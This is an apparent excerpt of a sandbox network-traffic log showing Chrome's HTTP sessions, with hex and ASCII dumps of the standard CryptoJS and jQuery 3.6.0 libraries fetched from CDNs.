                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9xtbS0dnS7LUjSIUJcLpQVIV%2FnAnooNI7C45vX0up4ZERvJa0W%2FMii6G0j7nAbnK4drAO2NeDupanMpPMMLXbu58un5QU8qj8FH%2F6IEwYGDvjNMt060Pnmckizsz8bOgGCOJiin"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c355b814729e-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC411INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                                                                                                                                                                Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                                                                                                                                                                                                Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                                                                                                                                                                                                Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                                                                                                                                                                                                Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                                                                                                                                                                                                Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                                                                                                                                                                                                Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                                                                                                                                                                                                Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                                                                                                                                                                                                Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                                                                                                                                                                                                Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                55192.168.2.1149877151.101.2.1374436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 89501
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:04 GMT
                                                                                                                                                                                                                                                Age: 3231095
                                                                                                                                                                                                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740039-EWR
                                                                                                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                                                                                                X-Cache-Hits: 2774, 6
                                                                                                                                                                                                                                                X-Timer: S1734709564.058659,VS0,VE0
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                2024-12-20 15:46:04 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                56192.168.2.1149883104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
